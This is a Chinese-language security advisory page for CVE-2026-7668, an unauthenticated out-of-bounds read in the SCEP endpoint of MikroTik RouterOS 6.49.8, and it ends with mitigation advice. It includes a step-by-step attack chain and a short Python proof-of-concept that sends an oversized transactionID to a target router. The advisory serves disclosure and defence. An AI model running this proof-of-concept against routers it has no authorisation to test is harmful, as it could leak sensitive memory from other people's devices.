CVE-2026-7668 CVSS 7.3 高危

CVE-2026-7668 MikroTik RouterOS越界读取漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7668

漏洞类型

越界读取

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MikroTik RouterOS

漏洞概述

MikroTik RouterOS 6.49.8版本中存在一个高危安全漏洞。该漏洞源于SCEP端点组件中`nova/lib/www/scep.p`库文件的`ASN1_STRING_data`函数处理不当。攻击者可通过操纵`transactionID`或`messageType`参数，远程触发越界读取错误。利用该漏洞无需认证且无用户交互要求，目前利用代码已公开。厂商尚未对此作出响应，存在信息泄露风险。

技术细节

该漏洞位于MikroTik RouterOS的SCEP（简单证书注册协议）服务实现中。具体受影响的文件路径为`nova/lib/www/scep.p`，核心问题在于`ASN1_STRING_data`函数在处理外部输入时缺乏足够的边界检查。当攻击者向SCEP端点发送包含特制长度或格式的`transactionID`和`messageType`参数的数据包时，程序会读取超出预分配缓冲区范围的内存数据。这种越界读取行为可能泄露敏感内存信息（如指针、加密密钥片段等），导致机密性受损。尽管CVSS评分中的完整性(I:L)和可用性(A:L)影响较低，但由于攻击复杂度低(AC:L)且无需权限(PR:N)，该漏洞具有较高的实用性。

攻击链分析

STEP 1

侦察

扫描网络中开放的MikroTik RouterOS设备，识别开启SCEP服务（默认端口8080或其他配置端口）的目标。

STEP 2

武器化

构造特制的HTTP请求，在`transactionID`或`messageType`字段填充超长字符串或特殊格式字符，以触发`ASN1_STRING_data`函数的越界读取。

STEP 3

交付

将构造好的恶意请求发送至目标设备的SCEP端点接口。

STEP 4

利用

目标设备解析请求时，由于缺乏边界检查，执行越界读取操作，导致内存数据泄露。

STEP 5

影响

攻击者获取到敏感内存信息，可能导致进一步的会话劫持或系统信息收集。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (SCEP Endpoint)
target_url = "http://<target-ip>:8080/scep"

# PoC: Manipulating transactionID to trigger Out-of-Bounds Read
# Sending an overly long transactionID to bypass buffer checks
payload_data = {
    "operation": "GetCACert",
    "messageType": "PKIMessage",
    "transactionID": "A" * 5000  # Excessive length to trigger OOB read
}

try:
    print("[*] Sending PoC request to target...")
    response = requests.get(target_url, params=payload_data, timeout=10)
    
    # Check if target responded or crashed
    if response.status_code == 200:
        print("[+] Request sent. Check response for memory leaks or errors.")
        print("Response snippet:", response.text[:200])
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[!] An error occurred: {e}")

影响范围

MikroTik RouterOS 6.49.8

防御指南

临时缓解措施

由于厂商目前尚未响应，建议立即通过防火墙策略阻断外部对SCEP端口的访问，或者在RouterOS配置中禁用Certificate相关的SCEP功能，以减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7668
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7668
3 Details https://www.cvedetails.com/cve/CVE-2026-7668/
4 VulDB https://vuldb.com/cve/CVE-2026-7668
5 Link https://github.com/ezio315/cve/issues/4
6 Link https://vuldb.com/submit/798623
7 Link https://vuldb.com/vuln/360804
8 Link https://vuldb.com/vuln/360804/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表